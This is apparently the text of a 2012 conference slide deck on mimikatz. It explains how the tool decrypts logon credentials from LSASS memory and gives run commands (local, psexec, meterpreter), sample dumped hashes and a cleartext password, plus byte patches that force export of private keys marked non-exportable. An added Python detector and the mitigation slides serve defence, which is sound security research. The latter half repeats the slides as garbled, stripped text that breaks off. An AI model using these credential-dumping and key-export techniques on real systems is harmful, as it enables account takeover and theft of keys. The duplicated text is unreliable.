07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process, to take benefit of its keys when we called it.
Can it be fun to decrypt outside the process?
- Yes it is… no more injection, just reading memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS
- When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
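Both paths above, injecting sekurlsa.dll with a remote thread and reading LSASS memory from outside, start with a handle to lsass.exe carrying specific access rights, which is what a defender can watch for. The following is an added example, not code from the original slides or from mimikatz: it classifies constructed Sysmon-style ProcessAccess (Event ID 10) records by the access mask granted on lsass.exe; the record layout, the allow-list and the sample lines are assumptions made for this example.

```python
"""Classify handle opens on lsass.exe by the access they were granted.

Added example (not code from the slides or from mimikatz). Sysmon records an
OpenProcess call as a ProcessAccess event (Event ID 10) with the GrantedAccess
mask; this sketch scores such records. The 'k=v|k=v' record format, the
allow-list and the sample lines are constructed for this example.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Standard Win32 process access rights (winnt.h).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# All three bits are needed to VirtualAllocEx / WriteProcessMemory /
# CreateRemoteThread into LSASS, i.e. the DLL-injection path.
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Assumed starting allow-list of system components that routinely open LSASS;
# to be tuned per environment, not a reference list.
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed Sysmon-style Event ID 10 records, one per line.
SAMPLE_EVENTS = [
    r"SourceImage=C:\Users\kiwi\Desktop\mimikatz.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1010",
    r"SourceImage=C:\Windows\System32\csrss.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1478",
    r"SourceImage=C:\Temp\loader.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x3A",
    r"SourceImage=C:\Windows\System32\svchost.exe|TargetImage=C:\Windows\System32\notepad.exe|GrantedAccess=0x1FFFFF",
    r"SourceImage=C:\Program Files\Agent\agent.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1000",
]


@dataclass
class Finding:
    source_image: str
    granted_access: int
    technique: str  # "read" (memory read) or "inject" (remote thread)


def parse_event(line: str) -> Dict[str, str]:
    """Split 'k=v|k=v' into a dict; a value may itself contain '='."""
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def classify(event: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding when a handle to lsass.exe permits reading or injection."""
    target = event.get("TargetImage", "").lower().rsplit("\\", 1)[-1]
    if target != "lsass.exe":
        return None
    source = event.get("SourceImage", "")
    if source.lower() in BENIGN_SOURCES:
        return None
    try:
        mask = int(event.get("GrantedAccess", "0"), 16)
    except ValueError:
        return None
    # Parenthesised on purpose: '==' binds tighter than '&' in Python.
    if (mask & INJECT_MASK) == INJECT_MASK:
        technique = "inject"
    elif mask & PROCESS_VM_READ:
        technique = "read"
    else:
        return None  # query-only handles, e.g. inventory tools
    return Finding(source, mask, technique)


def scan(lines: List[str]) -> List[Finding]:
    """Run classify() over raw records, keeping only the suspicious ones."""
    findings = []
    for line in lines:
        finding = classify(parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.technique:6} 0x{f.granted_access:04X} {f.source_image}")
```

On the constructed sample the scan flags the 0x1010 handle as a memory read and the 0x3A handle as an injection candidate, and ignores the allow-listed, non-LSASS and query-only records.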
mimikatz :: sekurlsa / LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
- RC4
- DESx
Keys (diagram): inside the lsass process, lsasrv holds
  g_cbRandomKey : DWORD (256)
  g_pRandomKey  : BYTE[g_cbRandomKey]
  g_pDESXKey    : BYTE[144]
  g_Feedback    : BYTE[8]
mimikatz loads its own lsasrv and copies… these values from lsass into it.
mimikatz :: sekurlsa / LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES
- AES
Keys (diagram): inside the lsass process, lsasrv holds
  InitializationVector : BYTE[16]
  h3DesKey -> KIWI_BCRYPT_KEY
  hAesKey  -> KIWI_BCRYPT_KEY
mimikatz copies… these from lsass into its own lsasrv.

typedef struct _KIWI_BCRYPT_KEY_DATA {
	DWORD size;
	DWORD tag;
	DWORD type;
	DWORD unk0;
	DWORD unk1;
	DWORD unk2;
	DWORD unk3;
	PVOID unk4;
	BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
	DWORD size;
	DWORD type;
	PVOID unk0;
	PKIWI_BCRYPT_KEY_DATA cle;
	PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa / memo

Security Packages
Package         | Symbols                                                  | Type
tspkg           | tspkg!TSGlobalCredTable                                  | RTL_AVL_TABLE
wdigest         | wdigest!l_LogSessList                                    | LIST_ENTRY
livessp         | livessp!LiveGlobalLogonSessionList                       | LIST_ENTRY
kerberos (nt5)  | kerberos!KerbLogonSessionList                            | LIST_ENTRY
kerberos (nt6)  | kerberos!KerbGlobalLogonSessionTable                     | RTL_AVL_TABLE
msv1_0          | lsasrv!LogonSessionList / lsasrv!LogonSessionListCount   | LIST_ENTRY / ULONG

Protection Keys
Key   | NT 5 Symbols                                | NT 6 Symbols
(IV)  |                                             | lsasrv!InitializationVector
RC4   | lsasrv!g_cbRandomKey / lsasrv!g_pRandomKey  |
DESx  | lsasrv!g_pDESXKey / lsasrv!g_Feedback       |
3DES  |                                             | lsasrv!h3DesKey
AES   |                                             | lsasrv!hAesKey
mimikatz :: sekurlsa / memo
Some commands:
  mimikatz privilege::debug sekurlsa::logonPasswords full exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)	/* Traitement du Kiwi (Aug  2 2012 01:32:28) */	// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full
Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
	msv1_0 :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	wdigest :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	tspkg :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	livessp : n.t. (LUID KO)
mimikatz :: sekurlsa / what we can do?
Basics
- No physical access to computer (first step to pass the hash, then pass the pass)
- No admin rights / system rights / debug privileges (…)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless ;))
- For privileged accounts: network login instead of interactive (when possible)
- Audit: pass the hash keeps traces and can lock accounts
- No admin rights / system rights / debug privileges, even for VIPs
- Use a separated network (or forest) for privileged tasks
More in depth
- Force strong authentication (SmartCard & Token) $ €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
- Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
- Let opportunities to stop retro compatibility
- Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto / what is it?
A little module that I wrote to:
- play with Windows Cryptographic API, CNG and RSA keys
- automate export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
- List
  • Providers
  • Stores
  • Certificates
  • Keys
- Export
  • Certificates
    - public, in DER format
    - with private keys, in PFX format
  • Private keys in PVK format - it's cool, OpenSSL can deal with it too
- Patch
  • CryptoAPI, in mimikatz context
  • CNG, in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz :: crypto / how it's protected
Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
- Yes, a computer/server opens a "session"
Export/Usage can be limited by:
- Password
- Popup
- Export/Archive flag not present
(Password and popup are a constraint for most users and unavailable for computer keys.)
The flag is decided at import time, for example:
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi / how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
- http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
- cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi / how it's exported ( level)
Diagram (everything inside the user process, with CryptoAPI and the RSA CSP):
  Load Private Key -> DPAPI Decode (PLAYSKOOL)
  Ask to export Key -> Exportable?
    yes -> Exported Key
    no  -> NTE_BAD_KEY_STATE
mimikatz :: crypto :: patchcapi / because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export, and checks if the key is exportable

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
	Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider       : Microsoft Enhanced Cryptographic Provider v1.0
	Type           : AT_KEYEXCHANGE
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz :: crypto :: patchcapi / because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:

.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi / demo time
Import, export, import as not exportable… export
mimikatz :: crypto :: patchcapi / limitations
Because:
- I'm lazy
- I've seen, in the majority of cases, RSA keys for real life use
  • Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng / how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
- http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context
Processes use RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
- It is, but it's not perfect…
mimikatz :: crypto :: cng / how it's exported ( level)
Diagram: Process -> CNG -> RPC -> KeyIso Service (LSASS Process)
  LSASS on NT6 is a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP
  Inside the KeyIso service:
    Load Private Key -> DPAPI Decode (PLAYSKOOL)
    Ask to export Key -> Exportable?
      yes -> Exported Key
      no  -> NTE_NOT_SUPPORTED
mimikatz :: crypto :: patchcng / because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey
This function does all the work to prepare the export, and checks if the key is exportable

mimikatz # crypto::exportKeys
[user] Clés CNG
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité : NON
	Taille clé    : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
	mod_cryptong::getPrivateKey ; PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng / because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng / demo time
Import, export, import as not exportable… export again
mimikatz :: crypto :: patchcng / limitations
The patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
- certutil can…
mimikatz :: crypto :: patchcng / bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
- Yeah, like the good old certutil

Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto / memo
Some commands:
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
  mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto / what we can do?
Exactly the same as for sekurlsa; it will prevent access to accounts/computer: no admin, no admin, no admin…
Basics
- Use smartcards/tokens for users certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth
- See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
- Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz / what else can it do?
- Play with minesweeper
- Manipulate some handles
- Pass the hash
- Dump SAM / AD
- Stop event monitoring
- Patch Terminal Server
- Basic GPO bypass
- Applocker / SRP bypass
- Driver
  - Play with tokens & privileges
  - Display SSDT x86 & x64
  - List minifilters actions
  - List Notifications (process, thread, image, registry)
  - List Objects hooks and procedures
  - …
- …
mimikatz / that's all folks
Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
- Microsoft, to always consider it as normal/acceptable
- Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
- You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog     : http://blog.gentilkiwi.com
mimikatz : http://blog.gentilkiwi.com/mimikatz
source   : https://code.google.com/p/mimikatz
email    : benjamin@gentilkiwi.com
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
